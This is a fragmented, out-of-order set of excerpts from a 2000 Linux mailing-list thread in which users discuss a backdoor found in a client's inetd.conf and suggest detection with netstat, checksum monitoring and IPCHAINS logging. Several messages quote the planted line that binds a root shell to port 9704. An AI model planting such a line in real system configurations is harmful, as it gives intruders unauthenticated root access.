On Tue, Sep 12, 2000 at 12:00:58PM -0400, rpjday wrote:
> On Tue, 12 Sep 2000, Hal Burgiss wrote:
>
> > On Tue, Sep 12, 2000 at 09:54:30AM -0500, Jonathan Wilson wrote:
> > > I was just thinking. I know there's trip wire and stuff. but it would be
> > > neat to have cron run a script, that did m
On Mon, 11 Sep 2000, Martin Brown wrote:
> The man page for 'netstat' on my system [RH 6.1] does not mention the '-a'
> option. What does it do?
On my system, the man page says:
-a, --all
The -a, --all option will print information about all
sockets, including the listeni
On Tue, 12 Sep 2000, tsombakos, mark spewed into the bitstream:
tm>Rat B*STARD!
tm>
tm>I thought I'd check out my inetd.conf too. I'd been looking
tm>at the log files daily, and I was usnig "snort" to
tm>watch for suspicious activity (mind you, I'm little
tm>more than a mere novice)
tm>
tm>Same
ary?
Eric
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED]]On Behalf Of Hal Burgiss
> Sent: Tuesday, September 12, 2000 8:33 AM
> To: [EMAIL PROTECTED]
> Subject: Re: highly suspicious line in inetd.conf
>
>
> On Tue, Sep 12, 2000 at 09
router that doesn't forward that port.
That's my current theory :)
Mark
>
> Message: 14
> Date: Tue, 12 Sep 2000 09:54:30 -0500
> To: [EMAIL PROTECTED]
> From: [EMAIL PROTECTED] (Jonathan Wilson)
> Subject: Re: highly suspicious line in inetd.conf
> Reply-To: [E
On Tue, 12 Sep 2000, Hal Burgiss wrote:
> On Tue, Sep 12, 2000 at 09:54:30AM -0500, Jonathan Wilson wrote:
> > I was just thinking. I know there's trip wire and stuff. but it would be
> > neat to have cron run a script, that did md5sum "checks" on various things,
> > and mailed you, if the sum
On Tue, Sep 12, 2000 at 09:54:30AM -0500, Jonathan Wilson wrote:
> I was just thinking. I know there's trip wire and stuff. but it would be
> neat to have cron run a script, that did md5sum "checks" on various things,
> and mailed you, if the sum changed on anything that's in it's list. Anyone
check freshmeat, today or yesterday, something was posted that does just
that.
On Tue, 12 Sep 2000, Jonathan Wilson wrote:
> I was just thinking. I know there's trip wire and stuff. but it would be
> neat to have cron run a script, that did md5sum "checks" on various things,
> and mailed you,
nd you, I'm little
>more than a mere novice)
>
>Same damn line. Looks like I know what I'm doing this
>weekend and learning IPCHAINS.
>
>Thanks, all. I would probably have never thought to look
>there.
>
>Mark
>
>
> >
> > Message: 2> Message
kend and learning IPCHAINS.
Thanks, all. I would probably have never thought to look
there.
Mark
>
> Message: 2> Message: 3
> Date: Mon, 11 Sep 2000 16:22:58 -0500
> From: "Michael R. Jinks" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: highly
I don't know anything about hacking a box, but if this guy/gal left this
gaping hole and you don't have logs saying where s/he came from I would
probably setup IP chains to log all connection attempts to the box on this
port. Maybe he is bright enough to log in from a static IP.
___
On Mon, 11 Sep 2000, Gordon Messmer wrote:
> I suggest you :
> netstat -avnp | grep LISTEN
>
Thank you for the above piece of "code".
The man page for 'netstat' on my system [RH 6.1] does not mention the '-a'
option. What does it do?
In my case, there are more inetd services listening than a
>Yep, that's an unashamed hack. This is your average "I'm too stupid to
>_hide_ the back door, so I'll hope that no one looks" script kiddie
>signature.
found more info on the cert site. right off the rpc.statd
vulnerability warning ( not a very creative cracker. I mean
jeeze, at least change t
On Mon, 11 Sep 2000, wYRd wrote:
> Looking over a clients system I found the following
> line in inetd.con:
> 9704 stream tcp nowait root /bin/sh sh -i
Yep, that's an unashamed hack. This is your average "I'm too stupid to
_hide_ the back door, so I'll hope that no one looks" script kiddie
si
On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
>
> Looking over a clients system I found the following
> line in inetd.con:
> 9704 stream tcp nowait root /bin/sh sh -i
EEK!
> telnet to the port and instant root access.
Yup.
> A quick look around didn't reveal any obvious
> problems.
On Mon, 11 Sep 2000, wYRd spewed into the bitstream:
w>
w>Looking over a clients system I found the following
w>line in inetd.con:
w> 9704 stream tcp nowait root /bin/sh sh -i
w>
w>telnet to the port and instant root access.
w>
w>A quick look around didn't reveal any obvious
w>problems. I'm wor
16 matches
Mail list logo
